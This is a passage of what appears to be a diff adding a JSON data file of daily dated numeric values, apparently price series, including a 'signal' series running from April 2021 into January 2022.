+ [ + "2024-08-15", + 33.67164993286133 + ], + [ + "2024-08-16", + 33.76018524169922 + ], + [ + "2024-08-19", + 35.06849670410156 + ], + [ + "2024-08-20", + 34.85208511352539 + ], + [ + "2024-08-21", + 35.329166412353516 + ], + [ + "2024-08-22", + 33.63230514526367 + ], + [ + "2024-08-23", + 34.689781188964844 + ], + [ + "2024-08-26", + 33.67164993286133 + ], + [ + "2024-08-27", + 33.95692825317383 + ], + [ + "2024-08-28", + 32.80601119995117 + ], + [ + "2024-08-29", + 32.63386154174805 + ], + [ + "2024-08-30", + 33.74542999267578 + ], + [ + "2024-09-03", + 30.666488647460938 + ], + [ + "2024-09-04", + 30.405811309814453 + ], + [ + "2024-09-05", + 30.504182815551758 + ], + [ + "2024-09-06", + 28.03020477294922 + ], + [ + "2024-09-09", + 29.072914123535156 + ], + [ + "2024-09-10", + 29.85494613647461 + ], + [ + "2024-09-11", + 31.758380889892578 + ], + [ + "2024-09-12", + 32.69780731201172 + ], + [ + "2024-09-13", + 33.125709533691406 + ], + [ + "2024-09-16", + 32.683048248291016 + ], + [ + "2024-09-17", + 32.70272445678711 + ], + [ + "2024-09-18", + 32.27482223510742 + ], + [ + "2024-09-19", + 34.7143669128418 + ], + [ + "2024-09-20", + 34.493038177490234 + ], + [ + "2024-09-23", + 34.74879455566406 + ], + [ + "2024-09-24", + 35.24064636230469 + ], + [ + "2024-09-25", + 35.36399459838867 + ], + [ + "2024-09-26", + 36.11400604248047 + ], + [ + "2024-09-27", + 35.49229049682617 + ], + [ + "2024-09-30", + 35.76860809326172 + ], + [ + "2024-10-01", + 34.253780364990234 + ], + [ + "2024-10-02", + 34.382076263427734 + ], + [ + "2024-10-03", + 34.303131103515625 + ], + [ + "2024-10-04", + 35.51203155517578 + ], + [ + "2024-10-07", + 34.34259796142578 + ], + [ + "2024-10-08", + 35.83275604248047 + ], + [ + "2024-10-09", + 36.69625473022461 + ], + [ + "2024-10-10", + 36.567962646484375 + ], + [ + "2024-10-11", + 36.66171646118164 + ], + [ + "2024-10-14", + 37.59922409057617 + ], + [ + "2024-10-15", + 36.09920883178711 + ], + [ + "2024-10-16", + 36.079471588134766 + ], + [ + "2024-10-17", + 36.18802261352539 + ], + [ + "2024-10-18", + 36.82947540283203 + ], + [ + "2024-10-21", + 37.03178787231445 + ], + [ + "2024-10-22", + 37.140342712402344 + ], + [ + "2024-10-23", + 35.4232063293457 + ], + [ + "2024-10-24", + 36.2669677734375 + ], + [ + "2024-10-25", + 36.878822326660156 + ], + [ + "2024-10-28", + 36.913360595703125 + ], + [ + "2024-10-29", + 37.934757232666016 + ], + [ + "2024-10-30", + 37.09099578857422 + ], + [ + "2024-10-31", + 34.268585205078125 + ], + [ + "2024-11-01", + 34.998863220214844 + ], + [ + "2024-11-04", + 34.67320251464844 + ], + [ + "2024-11-05", + 35.99065399169922 + ], + [ + "2024-11-06", + 38.911746978759766 + ], + [ + "2024-11-07", + 40.73249435424805 + ], + [ + "2024-11-08", + 40.831180572509766 + ], + [ + "2024-11-11", + 40.757164001464844 + ], + [ + "2024-11-12", + 40.53512191772461 + ], + [ + "2024-11-13", + 40.35749435424805 + ], + [ + "2024-11-14", + 39.50386047363281 + ], + [ + "2024-11-15", + 36.64691162109375 + ], + [ + "2024-11-18", + 37.38705062866211 + ], + [ + "2024-11-19", + 38.13706588745117 + ], + [ + "2024-11-20", + 38.092655181884766 + ], + [ + "2024-11-21", + 38.4676628112793 + ], + [ + "2024-11-22", + 38.610755920410156 + ], + [ + "2024-11-25", + 38.78839111328125 + ], + [ + "2024-11-26", + 39.3903694152832 + ], + [ + "2024-11-27", + 38.43806076049805 + ], + [ + "2024-11-29", + 39.41997528076172 + ], + [ + "2024-12-02", + 40.697959899902344 + ], + [ + "2024-12-03", + 41.058162689208984 + ], + [ + "2024-12-04", + 42.55818176269531 + ], + [ + "2024-12-05", + 42.20783996582031 + ], + [ + "2024-12-06", + 43.29338836669922 + ], + [ + "2024-12-09", + 42.2818603515625 + ], + [ + "2024-12-10", + 41.822975158691406 + ], + [ + "2024-12-11", + 44.058204650878906 + ], + [ + "2024-12-12", + 43.18483352661133 + ], + [ + "2024-12-13", + 44.11247634887695 + ], + [ + "2024-12-16", + 46.031917572021484 + ], + [ + "2024-12-17", + 45.41512680053711 + ], + [ + "2024-12-18", + 40.50551986694336 + ], + [ + "2024-12-19", + 39.93313980102539 + ], + [ + "2024-12-20", + 40.96934509277344 + ], + [ + "2024-12-23", + 42.1104736328125 + ], + [ + "2024-12-24", + 43.7838020324707 + ], + [ + "2024-12-26", + 43.68973922729492 + ], + [ + "2024-12-27", + 41.91244888305664 + ], + [ + "2024-12-30", + 40.229217529296875 + ], + [ + "2024-12-31", + 39.174720764160156 + ], + [ + "2025-01-02", + 38.92718505859375 + ], + [ + "2025-01-03", + 40.7935905456543 + ], + [ + "2025-01-06", + 42.184730529785156 + ], + [ + "2025-01-07", + 39.912376403808594 + ], + [ + "2025-01-08", + 39.94207763671875 + ], + [ + "2025-01-10", + 38.03606414794922 + ], + [ + "2025-01-13", + 37.640010833740234 + ], + [ + "2025-01-14", + 37.506343841552734 + ], + [ + "2025-01-15", + 40.04108810424805 + ], + [ + "2025-01-16", + 39.22422790527344 + ], + [ + "2025-01-17", + 41.15994644165039 + ], + [ + "2025-01-21", + 41.8431396484375 + ], + [ + "2025-01-22", + 43.46696090698242 + ], + [ + "2025-01-23", + 43.73429870605469 + ], + [ + "2025-01-24", + 42.947139739990234 + ], + [ + "2025-01-27", + 39.17967224121094 + ], + [ + "2025-01-28", + 40.917362213134766 + ], + [ + "2025-01-29", + 40.66487503051758 + ], + [ + "2025-01-30", + 41.1747932434082 + ], + [ + "2025-01-31", + 40.9520149230957 + ], + [ + "2025-02-03", + 39.961875915527344 + ], + [ + "2025-02-04", + 41.41242980957031 + ], + [ + "2025-02-05", + 41.95205307006836 + ], + [ + "2025-02-06", + 42.58078384399414 + ], + [ + "2025-02-07", + 40.956966400146484 + ], + [ + "2025-02-10", + 42.39761734008789 + ], + [ + "2025-02-11", + 42.095619201660156 + ], + [ + "2025-02-12", + 42.179786682128906 + ], + [ + "2025-02-13", + 43.95707702636719 + ], + [ + "2025-02-14", + 44.47194290161133 + ], + [ + "2025-02-18", + 44.74918746948242 + ], + [ + "2025-02-19", + 44.75413513183594 + ], + [ + "2025-02-20", + 44.20956039428711 + ], + [ + "2025-02-21", + 41.44213104248047 + ], + [ + "2025-02-24", + 39.95197296142578 + ], + [ + "2025-02-25", + 38.42716979980469 + ], + [ + "2025-02-26", + 38.67470169067383 + ], + [ + "2025-02-27", + 35.4666633605957 + ], + [ + "2025-02-28", + 37.090484619140625 + ], + [ + "2025-03-03", + 34.69435119628906 + ], + [ + "2025-03-04", + 34.31315612792969 + ], + [ + "2025-03-05", + 35.649837493896484 + ], + [ + "2025-03-06", + 32.69428253173828 + ], + [ + "2025-03-07", + 33.372528076171875 + ], + [ + "2025-03-10", + 29.610010147094727 + ], + [ + "2025-03-11", + 29.26346206665039 + ], + [ + "2025-03-12", + 30.263500213623047 + ], + [ + "2025-03-13", + 28.609973907470703 + ], + [ + "2025-03-14", + 30.63974952697754 + ], + [ + "2025-03-17", + 31.23383331298828 + ], + [ + "2025-03-18", + 29.659517288208008 + ], + [ + "2025-03-19", + 30.813024520874023 + ], + [ + "2025-03-20", + 30.49618148803711 + ], + [ + "2025-03-21", + 30.7833194732666 + ], + [ + "2025-03-24", + 32.73884201049805 + ], + [ + "2025-03-25", + 33.323020935058594 + ], + [ + "2025-03-26", + 31.469974517822266 + ], + [ + "2025-03-27", + 30.93372344970703 + ], + [ + "2025-03-28", + 28.47093963623047 + ], + [ + "2025-03-31", + 28.451082229614258 + ], + [ + "2025-04-01", + 29.10649871826172 + ], + [ + "2025-04-02", + 29.7569522857666 + ], + [ + "2025-04-03", + 24.97538185119629 + ], + [ + "2025-04-04", + 20.402353286743164 + ], + [ + "2025-04-07", + 20.481800079345703 + ], + [ + "2025-04-08", + 19.314956665039062 + ], + [ + "2025-04-09", + 26.122364044189453 + ], + [ + "2025-04-10", + 22.909822463989258 + ], + [ + "2025-04-11", + 24.121355056762695 + ], + [ + "2025-04-14", + 24.627811431884766 + ], + [ + "2025-04-15", + 24.72215461730957 + ], + [ + "2025-04-16", + 22.487773895263672 + ], + [ + "2025-04-17", + 22.42322540283203 + ], + [ + "2025-04-21", + 20.784683227539062 + ], + [ + "2025-04-22", + 22.373573303222656 + ], + [ + "2025-04-23", + 23.858190536499023 + ], + [ + "2025-04-24", + 25.888994216918945 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723163604736328 + ], + [ + "2025-04-29", + 27.244516372680664 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18792152404785 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997262954711914 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500734329223633 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280284881591797 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574142456055 + ], + [ + "2025-05-15", + 35.044979095458984 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890213012695 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.907928466796875 + ], + [ + "2025-05-23", + 32.92976760864258 + ], + [ + "2025-05-27", + 35.223731994628906 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.38560485839844 + ], + [ + "2025-06-04", + 36.67856216430664 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.011234283447266 + ], + [ + "2025-06-10", + 37.72623825073242 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685607910156 + ], + [ + "2025-06-17", + 36.524635314941406 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.973487854003906 + ], + [ + "2025-06-23", + 37.09067153930664 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276607513427734 + ], + [ + "2025-07-02", + 41.07826232910156 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.12887191772461 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.343788146972656 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.851661682128906 + ], + [ + "2025-07-22", + 43.169517517089844 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.025936126708984 + ], + [ + "2025-07-25", + 44.2748908996582 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.9213752746582 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23506164550781 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.23252868652344 + ], + [ + "2025-08-14", + 47.10307312011719 + ], + [ + "2025-08-15", + 46.43586349487305 + ], + [ + "2025-08-18", + 46.37611389160156 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241287231445 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.330482482910156 + ], + [ + "2025-08-28", + 46.15702819824219 + ], + [ + "2025-08-29", + 44.49397659301758 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.371131896972656 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.261627197265625 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.18187713623047 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.485904693603516 + ], + [ + "2025-10-08", + 54.265167236328125 + ], + [ + "2025-10-09", + 54.05085754394531 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.40261459350586 + ], + [ + "2025-10-15", + 51.434288024902344 + ], + [ + "2025-10-16", + 50.861141204833984 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.71194839477539 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.102474212646484 + ], + [ + "2025-10-27", + 58.02804946899414 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.361637115478516 + ], + [ + "2025-11-05", + 56.43817138671875 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.861141204833984 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30082702636719 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596221923828 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.198604583740234 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87642288208008 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.331729888916016 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080383300781 + ], + [ + "2025-12-09", + 55.83012771606445 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037155151367 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.833335876464844 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2021-04-26", + 331.5280456542969 + ], + [ + "2021-04-27", + 330.0917663574219 + ], + [ + "2021-04-28", + 328.97576904296875 + ], + [ + "2021-04-29", + 330.1596984863281 + ], + [ + "2021-04-30", + 327.9956970214844 + ], + [ + "2021-05-03", + 326.2488708496094 + ], + [ + "2021-05-04", + 320.3778076171875 + ], + [ + "2021-05-05", + 319.3006896972656 + ], + [ + "2021-05-06", + 321.7072448730469 + ], + [ + "2021-05-07", + 324.31768798828125 + ], + [ + "2021-05-10", + 316.1272888183594 + ], + [ + "2021-05-11", + 315.6905822753906 + ], + [ + "2021-05-12", + 307.5196228027344 + ], + [ + "2021-05-13", + 309.8970642089844 + ], + [ + "2021-05-14", + 316.73870849609375 + ], + [ + "2021-05-17", + 314.81719970703125 + ], + [ + "2021-05-18", + 312.6920166015625 + ], + [ + "2021-05-19", + 313.051025390625 + ], + [ + "2021-05-20", + 319.1065673828125 + ], + [ + "2021-05-21", + 317.34039306640625 + ], + [ + "2021-05-24", + 322.677734375 + ], + [ + "2021-05-25", + 323.1241760253906 + ], + [ + "2021-05-26", + 324.249755859375 + ], + [ + "2021-05-27", + 323.0367736816406 + ], + [ + "2021-05-28", + 324.05572509765625 + ], + [ + "2021-06-01", + 322.97857666015625 + ], + [ + "2021-06-02", + 323.60931396484375 + ], + [ + "2021-06-03", + 320.2420349121094 + ], + [ + "2021-06-04", + 325.6763610839844 + ], + [ + "2021-06-07", + 326.6468200683594 + ], + [ + "2021-06-08", + 326.8020935058594 + ], + [ + "2021-06-09", + 326.87969970703125 + ], + [ + "2021-06-10", + 330.28582763671875 + ], + [ + "2021-06-11", + 331.1495056152344 + ], + [ + "2021-06-14", + 334.3229064941406 + ], + [ + "2021-06-15", + 332.13946533203125 + ], + [ + "2021-06-16", + 330.9263916015625 + ], + [ + "2021-06-17", + 335.1282958984375 + ], + [ + "2021-06-18", + 332.49847412109375 + ], + [ + "2021-06-21", + 334.5649108886719 + ], + [ + "2021-06-22", + 337.6837158203125 + ], + [ + "2021-06-23", + 337.84893798828125 + ], + [ + "2021-06-24", + 339.9377136230469 + ], + [ + "2021-06-25", + 339.5199279785156 + ], + [ + "2021-06-28", + 343.6490783691406 + ], + [ + "2021-06-29", + 344.8926086425781 + ], + [ + "2021-06-30", + 344.3485107421875 + ], + [ + "2021-07-01", + 344.4845275878906 + ], + [ + "2021-07-02", + 348.4388122558594 + ], + [ + "2021-07-06", + 349.9447326660156 + ], + [ + "2021-07-07", + 350.68310546875 + ], + [ + "2021-07-08", + 348.5650939941406 + ], + [ + "2021-07-09", + 350.7413330078125 + ], + [ + "2021-07-12", + 352.1112365722656 + ], + [ + "2021-07-13", + 352.1112365722656 + ], + [ + "2021-07-14", + 352.7427978515625 + ], + [ + "2021-07-15", + 350.2652893066406 + ], + [ + "2021-07-16", + 347.4284362792969 + ], + [ + "2021-07-19", + 344.58172607421875 + ], + [ + "2021-07-20", + 348.58453369140625 + ], + [ + "2021-07-21", + 351.2757263183594 + ], + [ + "2021-07-22", + 353.5978088378906 + ], + [ + "2021-07-23", + 357.72686767578125 + ], + [ + "2021-07-26", + 358.0086364746094 + ], + [ + "2021-07-27", + 354.0640869140625 + ], + [ + "2021-07-28", + 355.42431640625 + ], + [ + "2021-07-29", + 356.0558166503906 + ], + [ + "2021-07-30", + 354.20013427734375 + ], + [ + "2021-08-02", + 354.229248046875 + ], + [ + "2021-08-03", + 356.37640380859375 + ], + [ + "2021-08-04", + 356.8912658691406 + ], + [ + "2021-08-05", + 359.15509033203125 + ], + [ + "2021-08-06", + 357.5811462402344 + ], + [ + "2021-08-09", + 358.2418518066406 + ], + [ + "2021-08-10", + 356.4055480957031 + ], + [ + "2021-08-11", + 355.79345703125 + ], + [ + "2021-08-12", + 357.0758361816406 + ], + [ + "2021-08-13", + 358.3292541503906 + ], + [ + "2021-08-16", + 358.4847412109375 + ], + [ + "2021-08-17", + 355.3271789550781 + ], + [ + "2021-08-18", + 351.9071960449219 + ], + [ + "2021-08-19", + 353.607421875 + ], + [ + "2021-08-20", + 357.2702331542969 + ], + [ + "2021-08-23", + 362.61376953125 + ], + [ + "2021-08-24", + 363.72137451171875 + ], + [ + "2021-08-25", + 364.13909912109375 + ], + [ + "2021-08-26", + 361.8267822265625 + ], + [ + "2021-08-27", + 365.3439025878906 + ], + [ + "2021-08-30", + 369.44390869140625 + ], + [ + "2021-08-31", + 369.1426696777344 + ], + [ + "2021-09-01", + 369.7546081542969 + ], + [ + "2021-09-02", + 369.5798645019531 + ], + [ + "2021-09-03", + 370.71649169921875 + ], + [ + "2021-09-07", + 371.24114990234375 + ], + [ + "2021-09-08", + 369.9490661621094 + ], + [ + "2021-09-09", + 368.67626953125 + ], + [ + "2021-09-10", + 365.878173828125 + ], + [ + "2021-09-13", + 365.6255798339844 + ], + [ + "2021-09-14", + 364.5861511230469 + ], + [ + "2021-09-15", + 367.29669189453125 + ], + [ + "2021-09-16", + 367.54925537109375 + ], + [ + "2021-09-17", + 363.1966247558594 + ], + [ + "2021-09-20", + 355.69189453125 + ], + [ + "2021-09-21", + 356.1295471191406 + ], + [ + "2021-09-22", + 359.45599365234375 + ], + [ + "2021-09-23", + 362.772705078125 + ], + [ + "2021-09-24", + 363.1129455566406 + ], + [ + "2021-09-27", + 360.21466064453125 + ], + [ + "2021-09-28", + 350.0213928222656 + ], + [ + "2021-09-29", + 349.44757080078125 + ], + [ + "2021-09-30", + 348.1636962890625 + ], + [ + "2021-10-01", + 350.3229064941406 + ], + [ + "2021-10-04", + 342.9698181152344 + ], + [ + "2021-10-05", + 347.599609375 + ], + [ + "2021-10-06", + 349.826904296875 + ], + [ + "2021-10-07", + 353.0365905761719 + ], + [ + "2021-10-08", + 351.2761535644531 + ], + [ + "2021-10-11", + 348.5819396972656 + ], + [ + "2021-10-12", + 347.36614990234375 + ], + [ + "2021-10-13", + 350.14788818359375 + ], + [ + "2021-10-14", + 356.596435546875 + ], + [ + "2021-10-15", + 358.84320068359375 + ], + [ + "2021-10-18", + 362.4516906738281 + ], + [ + "2021-10-19", + 365.19451904296875 + ], + [ + "2021-10-20", + 364.71795654296875 + ], + [ + "2021-10-21", + 366.9451904296875 + ], + [ + "2021-10-22", + 363.86199951171875 + ], + [ + "2021-10-25", + 367.5871887207031 + ], + [ + "2021-10-26", + 368.7445983886719 + ], + [ + "2021-10-27", + 369.60052490234375 + ], + [ + "2021-10-28", + 373.705078125 + ], + [ + "2021-10-29", + 375.54327392578125 + ], + [ + "2021-11-01", + 376.8271789550781 + ], + [ + "2021-11-02", + 378.4028015136719 + ], + [ + "2021-11-03", + 382.4198303222656 + ], + [ + "2021-11-04", + 387.3219299316406 + ], + [ + "2021-11-05", + 387.6915283203125 + ], + [ + "2021-11-08", + 387.1662292480469 + ], + [ + "2021-11-09", + 384.5012512207031 + ], + [ + "2021-11-10", + 378.8503112792969 + ], + [ + "2021-11-11", + 379.9006652832031 + ], + [ + "2021-11-12", + 383.8982238769531 + ], + [ + "2021-11-15", + 383.8106689453125 + ], + [ + "2021-11-16", + 386.5437927246094 + ], + [ + "2021-11-17", + 386.7480773925781 + ], + [ + "2021-11-18", + 390.7552795410156 + ], + [ + "2021-11-19", + 392.93402099609375 + ], + [ + "2021-11-22", + 388.3722839355469 + ], + [ + "2021-11-23", + 386.6021728515625 + ], + [ + "2021-11-24", + 387.84710693359375 + ], + [ + "2021-11-26", + 380.4940185546875 + ], + [ + "2021-11-29", + 388.75164794921875 + ], + [ + "2021-11-30", + 383.04229736328125 + ], + [ + "2021-12-01", + 376.5257568359375 + ], + [ + "2021-12-02", + 379.2393493652344 + ], + [ + "2021-12-03", + 372.6448669433594 + ], + [ + "2021-12-06", + 375.630859375 + ], + [ + "2021-12-07", + 386.94256591796875 + ], + [ + "2021-12-08", + 388.673828125 + ], + [ + "2021-12-09", + 382.95477294921875 + ], + [ + "2021-12-10", + 387.1176452636719 + ], + [ + "2021-12-13", + 381.52496337890625 + ], + [ + "2021-12-14", + 377.57611083984375 + ], + [ + "2021-12-15", + 386.1839294433594 + ], + [ + "2021-12-16", + 376.2533264160156 + ], + [ + "2021-12-17", + 374.37615966796875 + ], + [ + "2021-12-20", + 370.74462890625 + ], + [ + "2021-12-21", + 379.0419921875 + ], + [ + "2021-12-22", + 383.65814208984375 + ], + [ + "2021-12-23", + 386.5505676269531 + ], + [ + "2021-12-27", + 392.939208984375 + ], + [ + "2021-12-28", + 391.11798095703125 + ], + [ + "2021-12-29", + 391.0596008300781 + ], + [ + "2021-12-30", + 389.89093017578125 + ], + [ + "2021-12-31", + 387.456298828125 + ], + [ + "2022-01-03", + 391.18621826171875 + ], + [ + "2022-01-04", + 386.1123046875 + ], + [ + "2022-01-05", + 374.25054931640625 + 